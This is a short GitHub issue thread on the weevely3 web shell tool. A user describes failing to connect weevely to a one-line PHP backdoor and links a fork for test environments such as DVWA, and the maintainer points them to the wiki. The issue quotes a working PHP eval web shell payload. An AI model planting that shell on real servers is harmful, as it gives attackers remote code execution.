### ISSUE TITLE
simple one-word-backdoor program communication failed

### ISSUE THREAD

**Issue by lrtxpra** [epinna/weevely3#145]
when I create a simple backdoor program like
`<?php @eval($_POST['PASSWORD'])?>`

then use weevely to connect the backdoor,
it will appear 
`Backdoor communication failed, check URL availability and password`

then I found that obfpost.py has done somthing like encrypt and obfuscated code,
so it will cause error when load shell_php or shell_sh, 
so if u wanna use weevely to connect the simple backdoor like up top, 
maybe u should add some "trick code",
I've tried to commit some code,
but I think it's just useful for those who(me) just started learning with DVWA or other TEST-ENV ,
forked-brach: [simple_one_word_trojan_dev](https://github.com/lrtxpra/weevely3/tree/simple_one_word_trojan_dev)

**Comment by epinna** [comment]
This is not how weevely works, follow the instructions in the [wiki](https://github.com/epinna/weevely3/wiki/Getting-Started).
